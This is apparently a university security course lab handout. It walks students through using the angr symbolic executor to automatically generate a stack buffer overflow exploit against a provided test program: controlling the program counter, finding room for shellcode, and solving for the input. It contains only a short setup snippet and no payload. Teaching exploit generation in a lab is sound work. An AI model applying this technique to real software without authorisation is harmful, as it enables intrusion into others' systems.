===================================
Lab3: Automated Exploit Generation
===================================

Download the testing case from `here <l/example01.c>`__.
You need a Linux environment for all the labs.

--------------
0. Preparation
--------------

First, we are going to use Angr to perform symbolic execution to automatically
generate a successful exploit. Angr is not the fastest but it's based on python,
so it's easy to use.

Following the instructions at https://angr.io/ to install Angr.

**UPDATE**: it turns out angr does not support ``gets`` used in the example.
To fix this, download the `implementation <l/gets.py>`__ and add these lines
in your exploit script to register the handler before creating the ``project``
object.

.. code-block:: python

    import angr
    from gets import gets

    angr.SIM_LIBRARIES["libc.so.6"].add("gets", gets)

    proj = angr.Project("example01")


--------------
1. Objectives
--------------

Our objective for this lab assignment is to learn how to use a symbolic executor
to generate exploit against a stack buffer overflow vulnerability. Generally,
this includes three steps: finding the vulnerability, finding where to inject
the shellcode, and guiding the execution to injected shellcode.

Angr already provides `many good tutorials <https://github.com/angr/angr-doc/blob/master/docs/examples.md>`__
on how to use it to perform reverse engineering, including
`how to generate exploit <https://github.com/angr/angr-doc/blob/master/docs/examples.md#exploitation>`__.

------------
2. Workflow
------------

Step one, try to find an execution trace that would allow you to control the
program counter (PC). To do so, we let Angr perform path exploration to find a
simulation state is `unconstrained <https://docs.angr.io/core-concepts/pathgroups#stash-types>`__.
This is similar to the taint checker paper we have discussed.
Note that Angr considers a state is unconstrained when the PC is symbolic (i.e.,
under control of inputs), but such control could be partial (e.g., when only one
byte of the return address is overflowed). While such state could still be exploitable,
to make the exploit easier, you can further check `if all the bytes are symbolic
<https://github.com/angr/angr-doc/blob/master/examples/insomnihack_aeg/solve.py#L15>`__.

Once you've find a program state that could be exploitable, the next step is to
find a location to inject your shellcode. To do so, you can search the virtual
memory to find a sequence of continuous of symbolic/tainted bytes that would be
large enough to host the shellcode
(e.g., like `this <https://github.com/angr/angr-doc/blob/master/examples/insomnihack_aeg/solve.py#L38>`__).
Then, we check whether it is feasible to control the symbolic bytes so they can
be interpreted as shellcode. This should be straightforward if the bytes are
directly copied from the input. But for programs that perform transformation
over input, this could be challenging.

The last step is to connect the symbolic PC to the location of the shellcode,
by adding the constraint that the `PC should equal to the buffer that holds
the shellcode <https://github.com/angr/angr-doc/blob/master/examples/insomnihack_aeg/solve.py#L98>`__.
Finally, we ask the SMT solver to give us a feasible assignment to the input bytes
so all the conditions (1. control PC, 2. shellcode, 3. PC to shellcode)
would be satisfied.

--------------
3. Submission
--------------

Please submit your report through iLearn, preferably in PDF format.
In the report, please list your complete source code with sufficient explanation and output messages.